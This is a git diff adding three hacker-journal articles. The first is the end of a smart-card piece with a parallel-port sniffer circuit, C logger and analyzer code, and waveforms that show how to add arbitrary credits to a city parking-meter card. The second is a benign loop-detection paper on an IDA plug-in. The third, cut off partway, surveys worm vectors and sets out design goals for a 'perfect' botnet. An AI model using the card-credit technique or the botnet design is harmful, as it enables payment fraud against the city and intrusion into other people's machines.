less ghetto than me. + + + Parallel Port + +D10 - Ack - I6 o-------------------------, + | +D11 - Busy - I7 o-----------------------------, + | | +D12 - Paper Out - I5 o---------------------------------, + | | | +D13 - Select - I4 o-------------------------------------, + | | | | +D25 - Gnd o-----, | | | | + | | | | | + | | | | | + External 5V (USB) | | | | | + | | | | | +5V o------------------, | | | | | + | | | | | | +0V o-------*----*-----|---*-------------------|---|---|---|-----, + | | | | | | | | | + | | ,--==--==--==--==--==--==--==--==--==--==--, | + __+__ | |_ 20 19 18 17 16 15 14 13 12 11 | | + ///// | | ] 74HCT541N | | + | |' 1 2 3 4 5 6 7 8 9 10 | | + | '--==--==--==--==--==--==--==--==--==--==--' | + | | | | | | | | | | | | + | | '---*---*---* | | | | '-----' + '-----*---------, ,---|---* | | | + | | ,-|---|---* | | + Smart Card | | | | | | *---|------, + ,----------,----------, | | | | | | | *----, | + ,-------|--* Vcc | Gnd *--|-* | | | ,-, ,-, ,-, ,-, | | + | |----------|----------| | | | | | | | | | | | | | | + | ,-----|--* Reset | Vpp | | | | | | | | | | | | | | | + | | |----------|----------| | | | | |_| |_| |_| |_| | | + | | ,---|--* Clock | I/O *--|---|-* | |r1 |r2 |r3 |r4 | | + | | | |----------|----------| | | | | |10k|10k|10k|10k | | + | | | ,-|--* RF1 | RF2 *--|---* | | | | | | | | + | | | | '----------'----------' | | | '---*---*---*---' | | + | | *-|-------------------------|-|-|----------------------' | + | *-|-|-------------------------|-|-|------------------------' + | | | | | | | + | | | | Smart Card Reader | | | + | | | | ,----------,----------, | | | + '-------|--* Vcc | Gnd *--|-' | | + | | | |----------|----------| | | + '-----|--* Reset | Vpp | | | + | | |----------|----------| | | + '---|--* Clock | I/O *--|---' | + | |----------|----------| | + '-|--* RF1 | RF2 *--|-----' + '----------'----------' + + +----[ 5.2 - Sniffer Code ]------------------------------------------------ + + To monitor the connection, compile and run this code with a log +filename as an argument. This code is written for openbsd and uses it's +i386_iopl() function to get access to writing to the ports. You may need +to modify it to work on other OSs. Due to file i/o speed limitations, it +will log to the file whenever you hit ctrl+c. + + +/* + * Synchronous Smart Card Logger v1.0 [synclog.c] + * by h1kari + */ +#include +#include +#include +#include +#include + +#define BASE 0x378 +#define DATA (BASE) +#define STATUS (BASE + 1) +#define CONTROL (BASE + 2) +#define ECR (BASE + 0x402) +#define BUF_MAX (1024 * 1024 * 8) /* max log size 8mb */ + +int bufi = 0; +u_char buf[BUF_MAX]; +char *logfile; + +void +die(int signo) +{ + int i, b; + FILE *fh; + + /* open logfile and write output */ + if((fh = fopen(logfile, "w")) == NULL) { + perror("unable to open lpt log file"); + exit(1); + } + for(i = 0; i < bufi; i++) + printbits(fh, buf[i]); + + /* flush and exit out */ + fflush(fh); + fclose(fh); + _exit(0); +} + +int +printbits(FILE *fh, int b) +{ + fprintf(fh, "%d%d%d%d\n", + (b >> 7) & 1, (b >> 6) & 1, + (b >> 5) & 1, (b >> 4) & 1); +} + +int +main(int argc, char *argv[]) +{ + unsigned char a, b, c; + unsigned int *ptraddr; + unsigned int address; + + if(argc < 2) { + fprintf(stderr, "usage: %s \n", argv[0]); + exit(1); + } + + logfile = argv[1]; + + /* enable port writing privileges */ + if(i386_iopl(3)) { + printf("You need to be superuser to use this\n"); + exit(1); + } + + /* clear status flags */ + outb(STATUS, inb(STATUS) & 0x0f); + + /* set epp mode, just in case */ + outb(ECR, (inb(ECR) & 0x1f) | 0x80); + + /* log to file when we get ctrl+c */ + signal(SIGINT, die); + + /* fetch dataz0r */ + c = 0; + while(bufi < BUF_MAX) { + /* select low nibble */ + outb(CONTROL, (inb(CONTROL) & 0xf0) | 0x04); + + /* read low nibble */ + if((b = inb(STATUS)) == c) + continue; + + buf[bufi++] = c = b; /* save last state bits */ + } + + printf("buffer overflow!\n"); + die(0); +} + + + It might also help to drop the priority level when running it, if it +looks like you're having timing issues: + +# nice -n -20 ./synclog file.log + + +--[ 6 - Protocol Analysis ]----------------------------------------------- + + Once we get our log of the connection, we'll need to run it through +some tools to analyze and decode the protocol. I've put together a couple +of simple tools that'll make your life a lot easier. One will simply +decode the bytes that are transferred across based on the state changes. +The other will graph out the whole conversation 2-dimensionally so you +can graphically view patterns in the connection. + + +----[ 6.1 - Decoding Data ]----------------------------------------------- + + For decoding the data, we simply record bits to an input buffer when +the clock is in one state, and to an output buffer when the clock is in +the other. Then dump all of the bytes and reset our counter whenever +there's a reset. This should give us a dump of the data that's being +transferred between the two devices. + + +/* + * Synchronous Smart Card Log Analyzer v1.0 [analyze.c] + * by h1kari + */ +#include + +#ifdef PRINTBITS +#define BYTESPERROW 8 +#else +#define BYTESPERROW 16 +#endif + +void +pushbit(u_char *byte, u_char bit, u_char n) +{ + /* add specified bit to their byte */ + *byte &= ~(1 << (7 - n)); + *byte |= (bit << (7 - n)); +} + +void +printbuf(u_char *buf, int len, char *io) +{ + int i, b; + + printf("%s:\n", io); + + for(i = 0; i < len; i++) { +#ifdef PRINTBITS + int j; + + for(j = 7; j >= 0; j--) + printf("%d", (buf[i] >> j) & 1); + putchar(' '); +#else + printf("%02x ", buf[i]); +#endif + if((i % BYTESPERROW) == BYTESPERROW - 1) + printf("\n"); + } + + if((i % BYTESPERROW) != 0) { + printf("\n"); + } +} + +int +main(int argc, char *argv[]) +{ + u_char ibit, obit; + u_char ibyte, obyte; + u_char clk, rst, bit; + u_char lclk; + u_char ibuf[1024 * 1024], obuf[1024 * 1024]; + int ii = 0, oi = 0; + char line[1024]; + FILE *fh; + + if(argc < 2) { + fprintf(stderr, "usage: %s \n", argv[0]); + exit(1); + } + + if((fh = fopen(argv[1], "r")) == NULL) { + perror("unable to open lpt log\n"); + exit(1); + } + + lclk = 2; + while(fgets(line, 1024, fh) != NULL) { + bit = line[0] - 48; + rst = line[2] - 48; + clk = line[3] - 48; + bit = bit ? 0 : 1; + + if(lclk == 2) lclk = clk; + + /* print out buffers when we get a reset */ + if(rst) { + if(ii > 0 && oi > 0) { + printbuf(ibuf, ii, "input"); + printbuf(obuf, oi, "output"); + } + ibit = obit = 0; + ibyte = obyte = 0; + ii = oi = 0; + } + + /* if clock high input */ + if(clk) { + /* incr on clock change */ + if(lclk != clk) obit++; + pushbit(&ibyte, bit, ibit); + /* otherwise output */ + } else { + /* incr on clock change */ + if(lclk != clk) ibit++; + pushbit(&obyte, bit, obit); + } + + /* next byte */ + if(ibit == 8) { + ibuf[ii++] = ibyte; + ibit = 0; + } + + if(obit == 8) { + obuf[oi++] = obyte; + obit = 0; + } + + /* save last clock */ + lclk = clk; + } +} + + +----[ 6.2 - Timing Graph ]------------------------------------------------ + + Sometimes it really helps to see data graphically instead of just a +bunch of hex and 1's and 0's, so my friend pr0le threw together this perl +script that creates an image with a time diagram of the lines. By +analyzing this it made it easier to see how they were performing reads +and writes to the card. + + + +#!/usr/bin/perl +use GD; + +my $logfile = shift || die "usage: $0 \n"; + +open( F, "<$logfile" ); +my @lines = ; +close( F ); + +my $len = 3; + +my $im_len = scalar( @lines ); +my $w = $im_len * $len; +my $h = 100; + +my $im = new GD::Image( $w, $h ); +my $white = $im->colorAllocate( 255, 255, 255 ); +my $black = $im->colorAllocate( 0, 0, 0 ); + +$im->fill( 0, 0, $white ); + +my $i = 1; +my $init = 0; +my ($bit1,$bit2,$rst,$clk); +my ($lbit1,$lbit2,$lrst,$lclk) = (undef,undef,undef,undef); +my ($x1, $y1, $x2, $y2); +foreach my $line ( @lines ) { + ($bit1,$bit2,$rst,$clk) = ($line =~ m/^(\d)(\d)(\d)(\d)/); + if( $init ) { + &print_bit( $lbit1, $bit1, 10 ); + &print_bit( $lbit2, $bit2, 30 ); + &print_bit( $lrst, $rst, 50 ); + &print_bit( $lclk, $clk, 70 ); + } + ($lbit1,$lbit2,$lrst,$lclk) = ($bit1,$bit2,$rst,$clk); + $init = 1; + $i++; +} + +open( F, ">$logfile.jpg" ); +binmode F; +print F $im->jpeg; +close( F ); + +exit; + +sub print_bit { + my ($old, $new, $ybase) = @_; + + if( $new != $old ) { + if( $new ) { + $im->line( $i*$len, $ybase+10, $i*$len, $ybase+20, $black ); + $im->line( $i*$len, $ybase+20, $i*$len+$len, $ybase+20, $black ); + } else { + $im->line( $i*$len, $ybase+20, $i*$len, $ybase+10, $black ); + $im->line( $i*$len, $ybase+10, $i*$len+$len, $ybase+10, $black ); + } + } else { + if( $new ) { + $im->line( $i*$len, $ybase+20, $i*$len+$len, $ybase+20, $black ); + } else { + $im->line( $i*$len, $ybase+10, $i*$len+$len, $ybase+10, $black ); + } + } + + return; +} + + +----[ 6.3 - Conclusions ]------------------------------------------------- + + This code showed how the reserved lines on the smart card are used in +conjunction with credit increments and decrements. This is an analysis of +how it triggers a credit deduct or add on the card: + + + DEDUCT $0.10: + + ___________ ___________ +_________| |___________| |__________________ Reset + ____________________________________ +_____________________| |_____ Clk + ___________ +_________| |__________________________________________ I/O + ___________ +_________| |__________________________________________ Rsv1 + + Then issue write command: +00011001 00101000 11111111 00111100 +01001001 00000000 01100010 10001101 +11111111 11111111 01110111 10101101 + + + ADD $0.20: + + ___________ ___________ _____ +_________| |___________| |____________| Reset + ____________________________________ +_____________________| |_____ Clk +_____________________________________________ + |__________________ I/O + ___________________________________ +_________| |__________________ Rsv1 + + Then issue write command: +00011001 00101000 11111111 00111100 +01001001 00000000 01100010 10001101 +11111111 11111111 01110111 10101101 + _____ +__________________________________________________________| Reset + ________ ___________ ____________ +| |___________| |___________| |_____ Clk + ____________________ ________________________ +| |___________| |_____ I/O + ____________________ ________________________ +| 1 Credit |___________| 2 Credits |_____ Rsv1 + + + Since the parking meter will refund whatever remaining amount there is +to the card and doesn't have to do it one at a time like with decrements, +the write command supports writing multiple credits back onto the card. +Simply repeat the waveform above and assert Reset when you're finished +"refunding" however many credits you want. + + +--[ 7 - Conclusion ]------------------------------------------------------ + + By now, you're probably thinking that this article sucks because there +isn't any ./code that will just give you more $. Unfortunately, most +security smart card protocols are fairly proprietary and whatever code I +released probably wouldn't work in your particular city. And all of the +data and waveforms I've included in this article probably gives the city +it does correspond to, enough info to start camping white vans on my +front lawn. ;-o + + Instead of lame vendor specific code, we're aiming to give you +something much more powerful in the next part to this article which will +allow you to emulate arbitrary smart cards and simple electronic +protocols (thx spidey). So stay tuned for the next uninformed article +from Dachb0den Labs. + +-h1kari 0ut diff --git a/uninformed/1.4.txt b/uninformed/1.4.txt new file mode 100644 index 0000000..a5de95d --- /dev/null +++ b/uninformed/1.4.txt @@ -0,0 +1,380 @@ +Loop Detection +Peter Silberman +peter.silberman@gmail.com + +1) Foreword + +Abstract: During the course of this paper the reader will gain new knowledge +about previous and new research on the subject of loop detection. The topic of +loop detection will be applied to the field of binary analysis and a case study +will given to illustrate its uses. All of the implementations provided in this +document have been written in C/C++ using Interactive Disassembler (IDA) +plug-ins. + +Thanks: The author would like to thank Pedram Amini, thief, Halvar Flake, +skape, trew, Johnny Cache and everyone else at nologin who help with ideas, and +kept those creative juices flowing. + + +2) Introduction + +The goal of this paper is to educate the reader both about why loop detection +is important and how it can be used. When a security researcher thinks of +insecure coding practices, things like calls to strcpy and sprintf are some of +the first things to come to mind. These function calls are considered low +hanging fruit. Some security researchers think of integer overflows or +off-by-one copy errors as types of vulnerabilities. However, not many people +consider, or think to consider, the mis-usage of loops as a security problem. +With that said, loops have been around since the beginning of time (e.g. first +coding languages). The need for a language to iterate over data to analyze +each object or character has always been there. Still, not everyone thinks to +look at a loop for security problems. What if a loop doesn't terminate +correctly? Depending on the operation the loop is performing, it's possible +that it could corrupt surrounding memory regions if not properly managed. If +the loop frees memory that no longer exists or is not memory, a double-free bug +could've been found. These are all things that could, and do, happen in a +loop. + +As the low hanging fruit is eliminated in software by security researchers and +companies doing decent to moderate QA testing, the security researchers have to +look elsewhere to find vulnerabilities in software. One area that has only +been touched on briefly in the public relm, is how loops operate when +translated to binaries BugScan is an example of a company that has implemented +"buffer iteration" detection but hasn't talked publically about it. +http://www.logiclibrary.com. The reader may ask: why would one want to look at +loops? Well, a lot of companies implement their own custom string routines, +like strcpy and strcat, which tend to be just as dangerous as the standard +string routines. These functions tend to go un-analyzed because there is no +quick way to say that they are copying a buffer. Due to this reason, loop +detection can help the security research identify areas of interest. During +the course of this article the reader will learn of the different ways to +detect loops using graph analysis, how to implement loop detection, see a new +loop detection IDA plug-in, and a case study that will tie it all together. + + +3) Algorithms Used to Detect Loops + +A lot of research has been done on the subject of loop detection. The +research, however, was not done for the purpose of finding and exploiting +vulnerabilities that exist inside of loops. Most research has been done with +an interest in recognizing and optimizing loops A good article about loop +optimization and compiler optimization is +http://www.cs.princeton.edu/courses/archive/spring03/cs320/notes/loops.pdf . +Research on the optimization of loops has led scientists to classify various +types of loops. There are two distinct categories to which any loop will +belong. Either the loop will be an irreducible loop Irreducible loops are +defined as "loops with multiple entry [points]" +(http://portal.acm.org/citation.cfm?id=236114.236115) or a reducible loop +Reducible loops are defined as "loops with one entry [point]" +(http://portal.acm.org/citation.cfm?id=236114.236115). Given that there are +two different distinct categories, it stands to reason that the two types of +loops are detected in different fashions. Two popular papers on loop detection +are Interval Finding Algorithm and Identifying Loops Using DJ Graphs. This +document will cover the most widely accepted theory on loop detection. + + +3.1) Natural Loop Detection + +One of the most well known algorithms for loop detection is demonstrated in the +book Compilers Principles, Techniques, and Tools by Alfred V. Aho, Ravi Sethi +and Jeffrey D. Ullman. In this algorithm, the authors use a technique that +consists of two components to find natural loops A natural loop "Has a single +entry point. The header dominates all nodes in the loop." +(http://www-2.cs.cmu.edu/afs/cs.cmu.edu/academic/class/15745-s03/public/lectures/L7_handouts.pdf +all loops are not natural loops. + +The first component of natural loop detection is to build a dominator tree out +of the control flow graph (CFG). A dominator can be found when all paths to a +given node have to go through another node. A control flow graph is essentially +a map of code execution with directional information. The algorithm in the +book calls for the finding of all the dominators in a CFG. Let's look at the +actual algorithm. + +Starting from the entry node, the algorithm needs to check if there is a path +to the slave from the entry node. This path has to avoid the master node. If +it is possible to get to the slave node without touching the master node, it +can be determined that the master node does not dominate the slave node. If it +is not possible to get to the slave node, it is determined that the master node +does dominate the slave. To implement this routine the user would call the +is_path_to(ea_t from, ea_t to, ea_t avoid) function included in loopdetection.cpp. +This function will essentially check to see if there is a path from the +parameter from that can get to the parameter to, and will avoid the node +specified in avoid. Figure illustrates this algorithm. + +As the reader can see from Figure 1, there is a loop in this CFG. Let B to C +to D be the path of nodes that create a loop, it will be represented as +B->C->D. There is also another loop from nodes B->D. Using the algorithm +described above it is possible to verify which of these nodes is involved in +the natural loop. The first question to ask is if the flow of the program can +get from A to D while avoiding B. As the reader can see, it is impossible in +this case to get to D avoiding B. As such, a call to the is_path_to function +will tell the user that B Dominates D. This can be represented as B Dom D, and +B Dom C. This is due to the fact that there is no way to reach C or D without +going through B. One question that might be asked is how exactly does this +demonstrate a loop? The answer is that, in fact, it doesn't. The second +component of the natural loop detection checks to see if there is a link, or +backedge, from D to B that would allow the flow of the program to return to +node B to complete the loop. In the case of B->D there exists a backedge that +does complete the loop. + + +3.2) Problems with Natural Loop Detection + +There is a very big problem with natural loops. The problem is with the +natural loop definition which is ``a single entry point whose header dominates +all the nodes in the loop''. Natural loop detection does not deal with +irreducible loops, as defined previously. This problem can be demonstrated in +figure + +As the reader can see both B and D are entry points into C. Also neither D nor +B dominates C. This throws a huge wrench into the algorithm and makes it only +able to pick up loops that fall under the specification of a natural loop or +reducible loop It is important to note that it is next that it is next to +impossible to reproduce + + +4) A Different Approach to Loop Detection + +The reader has seen how to detect dominators within a CFG and how to use that +as a component to find natural loops. The previous chapter described why +natural loop detection was flawed when trying to detect irreducible loops. For +binary auditing, the tool will need to be able to pick up all loops and then +let the user deduce whether or not the loops are interesting. This chapter +will introduce the loop algorithm used in the IDA plug-in to detect loops. + +To come up with an algorithm that was robust enough to detect both loops in the +irreducible and reducible loop categories, the author decided to modify the +previous definition of a natural loop. The new definition reads "a loop can +have multiple entry points and at least one link that creates a cycle." This +definition avoids the use of dominators to detect loops in the CFG. + +The way this alternative algorithm works is by first making a call to the +is_reference_to(ea_t to, ea_t ref) function. The function is_reference_to will +determine if there is a reference from the ea_t specified by ref to the +parameter to. This check within the loop detection algorithm determines if +there is a backedge or link that would complete a loop. The reason this check +is done first is for speed. If there is no reference that would complete a +loop then there is no reason to call is_path_to, thus preventing unnecessary +calculations. However, if there is a link or backedge, a call to the +overloaded function is_path_to(ea_t from, ea_t to) is used to determine if the +nodes that are being examined can even reach each other. The is_path_to function +simulates all possible code execution conditions by following all possible +edges to determine if the flow of execution could ever reach parameter to when +starting at parameter from. The function is_path_to(ea_t from, ea_t to) returns +one (true) if there is indeed a path going from from to to. With both of these +functions returning one, it can be deduced that these nodes are involved in the +loop. + + +4.1) Problems with new approach + +In every algorithm there can exists small problems, that make the algorithm far +from optimal. This problem applies to the new approach presented above. The +algorithm presented above has not been optimized for performance. The algorithm +runs in a time of O(N2), which carries quite a load if there are more than 600 +or so nodes. + +The reason that the algorithm is so time consuming is that instead of +implementing a Breadth First Search (BFS), a Depth First Search (DFS) was +implemented, in the is_path_to function which computes all possible paths to and +from a given node. Depth First Search is much more expensive than Breadth First +Search, and because of that the algorithm may in some rare cases suffer. If +the reader is interested in how to implement a more efficient algorithm for +finding the dominators, the reader should check out Compiler Design +Implementation by Steven S. Muchnick. + + +It should be noted that in future of this plug-in there will be optimizations +made to the code. The optimizations will specifically deal new implementations +of a Breadth First Search instead of the Depth First Search, as well as other +small optimizations. + + +5) Loop Detection Using IDA Plug-ins + +In every algorithm and theory there exists small problems. It is important to +understand the algorithm presented + +The plug-in described in this document uses the Function Analyzer Class +(functionanalyzer) that was developed by Pedram Amini +(http://labs.idefense.com) as the base class. The Loop Detection +(loopdetection) class uses inheritance to glean its attributes from Function +Analyzer. The reason inheritance is used is primarily for ease of development. +Inheritance is also used so that instead of having to re-add functions to a new +version of Function Analyzer, the user only has to replace the old file. The +final reason inheritance is used is for code conformity, which is accomplished +by creating virtual functions. These virtual functions allow the user to +override methods that are implemented in the Function Analyzer. This means +that if a user understands the structure of function analyzer, they should not +have a hard time understanding loop detections structure. + + +5.1) Plug-in Usage + +To best utilize this plug-in the user needs to understand its features and +capabilities. When a user runs the plug-in they will be prompted with a window +that is shown in figure . Each of the options shown in figure are described +individually. + + +Graph Loop + +This feature will visualize the loops, marking the entry of a loop with green +border, the exit of a loop with a red border and a loop node with a yellow +border. Highlight Function Calls This option allows the user to highlight the +background of any function call made within the loop. The highlighting is done +within IDA View. + + +Output Stack Information + +This is a feature that is only enabled with the graph loop option. When this +option is enabled the graph will contain information about the stack of the +function including the variables name, whether or not it is an argument, and +the size of the variable. This option is a great feature for static auditing. + + +Highlight Code + +This option is very similar to Highlight Function except instead of just +highlighting function calls within loops it will highlight all the code that is +executed within the loops. This makes it easier to read the loops in IDA View + + +Verbose Output + +This feature allows the user to see how the program is working and will give +more information about what the plug-in is doing. + + +Auto Commenting + +This option adds comments to loops nodes, such as where the loop begins, where +it exits, and other useful information so that the user doesn't have to +continually look at the graph. + + +All Loops Highlighting of Functions + +This feature will find every loop within the IDA database. It will then +highlight any call to any function within a loop. The highlighting is done +within the IDA View making navigation of code easier. + + +All Loops Highlighting of Code + +This option will find every loop within the database. It will then highlight +all segments of code involved in a loop. The highlighting of code will allow +for easier navigation of code within the IDA View. + + +Natural Loops + +This detection feature allows the user to only see natural loops. It may not +pick up all loops but is an educational implementation of the previously +discussed algorithm. + + +Recursive Function Calls + +This detection option will allow the user to see where recursive function calls +are located. + + +5.2) Known Issues + +There a couple of known issues with this plug-in. It does not deal with rep* +instructions, nor does it deal with mov** instructions that might result in +copied buffers. Future versions will deal with these instructions, but since +it is open-sourced the user can make changes as they see fit. Another issue is +that of ``no-interest''. By this the author means detecting loops that aren't +of interest or don't pose a security risk. These loops, for example, may be +just counting loops that don't write memory. Halvar Flake describes this topic +in his talk that was given at Blackhat Windows 2004. Feel free to read his +paper and make changes accordingly. The author will also update the plug-in +with these options at a later date. + + +5.3) Case Study: Zone Alarm + +For a case study the author chose Zone Alarm's vsdatant.sys driver. This +driver does a lot of the dirty work for Zone Alarm such as packet filtering, +application monitoring, and other kernel level duties. Some may wonder why it +would be worthwhile to find loops in a driver. In Zone Alarm's case, the user +can hope to find miscalculations in lengths where they didn't convert a signed +to unsigned value properly and therefore may cause an overflow when looping. +Anytime an application takes data in remotely that may be type-casted at some +point, there is always a great chance for loops that overflow their bounds. + +When analyzing the Zone Alarm driver the user needs to select certain options +to get a better idea of what is going on with loops. First, the user should +select verbose output and All Loops Highlighting of Functions to see if there +are any dangerous function calls within the loop. This is illustrated in +figure . + +After running through the loop detection phase, some interesting results are +found that are shown in figure . + +Visiting the address 0x00011a21 in IDA shows the loop. To begin, the reader +will need to find the loop's entry point, which is at: + + .text:00011A1E jz short loc_11A27 + +At the loop's entry point, the reader will notice: + + .text:00011A27 push 206B6444h ; Tag + .text:00011A2C push edi ; NumberOfBytes + .text:00011A2D push 1 ; PoolType + .text:00011A2F call ebp ;ExAllocatePoolWithTag + +At this point, the reader can see that every time the loop passes through its +entry point it will allocate memory. To determine if the attacker can cause a +double free error, further investigation is needed. + + .text:00011A31 mov esi, eax + .text:00011A33 test esi, esi + .text:00011A35 jz short loc_11A8F + +If the memory allocation within the loop fails, the loop terminates correctly. +The next call in the loop is to ZwQuerySystemInformation which tries to acquire +the SystemProcessAndThreadsInformation. + + .text:00011A46 mov eax, [esp+14h+var_4] + .text:00011A4A add edi, edi + .text:00011A4C inc eax + .text:00011A4D cmp eax, 0Fh + .text:00011A50 mov [esp+14h+var_4], eax + .text:00011A54 jl short loc_11A1C + +This part of the loop is quite un-interesting. In this segment the code +increments a counter in eax until eax is greater than 15. It is obvious that +it is not possible to cause a double free error in this case because the user +has no control over the loop condition or data within the loop. This ends the +investigation into a possible double free error. + +Above is a good example of how to analyze loops that may be of interest. With +all binary analysis it is important to not only identify dangerous function +calls but to also identify if the attacker can control data that might be +manipulated or referenced within a loop. + + +6) Conclusion + +During the course of this paper, the reader has had a chance to learn about the +different types of loops and some of the method of detecting them. The reader +has also gotten an in-depth view of the new IDA plug-in released with this +article. Hopefully now when the reader sees a loop, whether in code or binary, +the reader can explore the loop and determine if it is a security risk or not. + + +Bibliography + +Tarjan, R. E. 1974. Testing flow graph reducibility. J +Comput. Syst. Sci. 9, 355-365. + +Sreedhar, Vugranam, Guang Gao, Yong-Fong Lee. Identifying +loops using DJ graphs. +http://portal.acm.org/citation.cfm?id=236114.236115 + +Flake, Halvar. Automated Reverse Engineering. +http://www.blackhat.com/presentations/win-usa-04/bh-win-04-flake.pdf diff --git a/uninformed/1.5.txt b/uninformed/1.5.txt new file mode 100644 index 0000000..d9214b6 --- /dev/null +++ b/uninformed/1.5.txt @@ -0,0 +1,572 @@ +Social Zombies - Aspects of Trojan Networks +May, 2005 +warlord +warlord / nologin.org + + +1) Introduction + + +While I'm sitting here and writing this article, my firewall is +getting hammered by lots and lots of packets that I never asked for. +How come? In the last couple of years we saw the internet grow into +a dangerous place for the uninitiated, with worms and viruses +looming almost everywhere, often times infecting systems without +user interaction. This article will focus on the subclass of malware +commonly referred to as worms, and introduce some new ideas to the +concept of worm networks. + +2) Worm Infection Vectors + + +The worms around today can mostly be put into one the four +categories discussed in the following sections. + +2.1) Mail + +The mail worm is the simplest type of worm. It's primary +mode of propagation is through social engineering. By sending large +quantities of mail with content that deceives people and/or triggers +their curiosity, recipients are tricked into running an attached +program. Once executed, the program will send out copies of itself +via email to recipients found in the victims address book. This type +of worm is usually stopped quickly when antivirus companies update +their signature files, and mail servers running those AV products +start filtering the worm mails out. Users, in general, are becoming +more and more aware of this type of malware, and many won't run +attachments sent in mail anymore. Regardless, this method of +infection still manages to be successful. + + +2.2) Browser + +Browser-based worms, which primarily work against Internet Explorer, +make use of vulnerabilities that exist in web-browsers. What +generally happens is that when a users visits a malicious website, +an exploit will make Internet Explorer download and execute code. As +there are well known vulnerabilities in Internet Explorer at all +times that are not yet fixed, the bad guys usually have a couple of +days or weeks to spread their code. Of course, the infection rate +heavily depends on the number of visitors on the website hosting the +exploit. One approach that has been used in the past to gain access +to a wider 'audience' involved sending mail to thousands of users in +an attempt to get the users to visit a malicious website. Another +approach involved hacking advertisement companies and changing their +content in order to make them serve exploits and malware on high +profile sites. + + +2.3) Peer to Peer + +The peer to peer worm is quite similar to the mail worm; it's all +about social engineering. Users hunting for the latest mp3s or +pictures of their most beloved celebrity find similarly named +programs and scripts, trying to deceive the user to download and +execute them. Once active on the users system, the malcode will make +sure it's being hosted by the users p2p application to spread +further. Even if downloaded, host based anti-virus scanners with +recent signatures will catch most of these programs before they can +be run. + + +2.4) Active + +This one is the most dangerous worm, as it doesn't require any sort +of user interaction at all. It also requires the highest level of +skill to write. Active worms spread by scanning the internet for one +or more types of vulnerabilities. Once a vulnerable target is +found, an exploit attempt is made that, if successful, results in +the uploading of the worm to the attacked site where propagation can +continue in the same form. These worms are usually spotted first by +an increasing number of hosts scanning the internet, most often +scanning for a single port. These worms also usually exploit +weaknesses that are well-known to the public for hours, days, weeks +or months. Examples of this type of worm include the Wank worm, +Code Red, Sadmind, SQL Slammer, Blaster, Sasser and others. As the +use of firewalls and NAT routers increases, and as anti-exploit +techniques like the one employed by Windows XP SP2 become more +common, these worms will find less hosts to infect. To this point, +from the time of this writing, it's been a while since the last big +active worm hit the net. + + +Other active infection vectors include code spreading via unset or +weak passwords on CIFS Common Internet File System. The +protocol used to exchange data between Windows hosts via network +shares. shares, IRC and instant messaging networks, Usenet, and +virtually every other data exchange protocol. + +3) Motives + +3.1) Ego + +Media attention often is a major motivation behind a worm. Coders +bolstering their ego by seeing reports on their worm on major sites +on the internet as well as tv news and newspapers with paniced +warnings of the latest doomsday threat which may take down the +planet and result in a 'Digital Pearl Harbor' seems +to be quite often the case. Huge media attention usually also means +huge law enforcement attention, and big efforts will be made to +catch the perpetrator. Though especially wide open (public) WIFI +networks can make it quite difficult to catch the perpetrator by +technological means, people boasting on IRC and, as in the case of +Sasser, bounties, can quickly result in the worm's author being +taken into custody. + + +3.2) DDoS + +The reason for a DDoS botnet is usually either the wish to have +enough firepower to virtually shoot people/sites/organizations off +the net, or extortion, or a combination of both. The extortion of +gambling websites before big sports events is just one example of +many cases of extortion involving DDoS. The attacker usually takes +the website down for a couple of hours to demonstrate his ability to +do so whenever it pleases him, and sends a mail to the owner of the +website, asking for money to keep the firepower away from his site. +This sort of business model is well known for millenia, and merely +found new applications online. + + +3.3) Spamming + +This one is also about money in the end. Infected machines are +(ab)used as spam zombies. Each machine sends their master's +unsolicited mail to lots and lots of unwilling recipients. The +owners of these systems usually offer their services to the spam +industry and thus make money of it. + + +3.4) Adware + +Yet another reason involving money. Just like on TV and Google, +advertisements can be sold. The more people seeing the +advertisement, the more money can be requested from the people that +pay for their slogan to be displayed on some end users Windows. (Of +course, it could be Linux and MacOS too, but, face it, no adware +attacks those) + + +3.5) Hacking + +A worm that infects and backdoors a couple thousand hosts is a great +way to quickly and easily obtain data from those systems. Examples +of data that may be worth stealing includes accounts for online +games, credit card numbers, personal information that can be used in +identity theft scams, and more. There has even been a report that +items of online games were being stolen to sell those later on +E-bay. Already having compromised one machine, enhancing the +influence into some network can be much easier of course. Take for +example the case of a heavily firewalled company. A hacker can't get +inside using an active approach, but notices that one of his malware +serving websites infected a host within that network. Using a +connect-back approach, where the infected node connects to the +attacker, a can tunnel can be built through the firewall thereby +allowing the attacker to reach the internal network. + +4) Botnets + +While I did mention DDoS and spam as reasons for infection already, +what I left out so far was the infrastructure of hundreds or +thousands of compromised machines, which is usually called a +botnet. Once a worm has infected lots of systems, an +attacker needs some way to control his zombies. Most often the nodes +are made to connect to an IRC server and join a (password protected) +secret channel. Depending on the malware in use, the attacker can +usually command single or all nodes sitting on the channel to, for +example, DDoS a host into oblivion, look for game CD keys and dump +those into the channel, install additional software on the infected +machines, or do a whole lot of other operations. While such an +approach may be quite effective, it has several shortcomings. + +- IRC is a plaintext protocol. + + Unless every node builds an SSL tunnel to an SSL-capable IRCD, + everything that goes on in the channel will be sent from the IRCD to + all nodes connected, which means that someone sniffing from an + infected honeypot can see everything going on in the channel, + including commands and passwords to control the botnet. Such a + weakness allows botnets to be stolen or destroyed (f.ex. by issuing + a command to make them connect to a new IRCD which is on IP + 127.0.0.1). + +- It's a single point of failure. + + What if the IRCD goes down because some victim contacted the admin + of the IRC server? On top of this, an IRC Op (a IRC administrator) + could render the channel inaccessible. If an attacker is left + without a way to communicate with all of the zombie hosts, they + become useless. + +A way around this dilemma is to make use of dynamic DNS sites like +www.dyndns.org. Instead of making the zombies connect to +irc.somehost.com, the attacker can install a dyndns client which +then allows drones to reference a hostname that can be directed to a +new address by the attacker. This allows the attacker to migrate +zombies from one IRC server to the next without issue. Though this +solves the problem of reliability, IRC should not be considered +secure enough to operate a botnet successfully. + + +The question, then, is what is a better solution? It seems the +author of the trojan Phatbot already tried to find a way +around this problem. His approach was to include peer to peer +functionality in his code. He ripped the code of the P2P project +``Waste'' and incorporated it into his creation. The problem was, +though, that Waste itself didn't include an easy way to exchange +cryptographic keys that are required to successfully operate the +network, and, as such, neither did Phatbot. The author is not aware +of any case where Phatbot's P2P functionality was actually used. +Then again, considering people won't run around telling everyone +about it (well, not all of them at least), it's possible that such a +case is just not publicly known. + + +To keep a botnet up and running, it requires reliability, +authentication, secrecy, encryption and scalability. How can all of +those goals be achieved? What would the basic functionality of a +perfect botnet require? Consider the following points: + + - An easy way to quickly send commands to all nodes + - Untraceability of the source IP address of a command + - Impossibile to judge from an intercepted command packet which node it was + addressed to + - Authentication schemes to make sure only authorized personnel operate the + zombie network + - Encryption to conceal communication + - Safe software upgrade mechanisms to allow for functionality enhancements + - Containment; so that a single 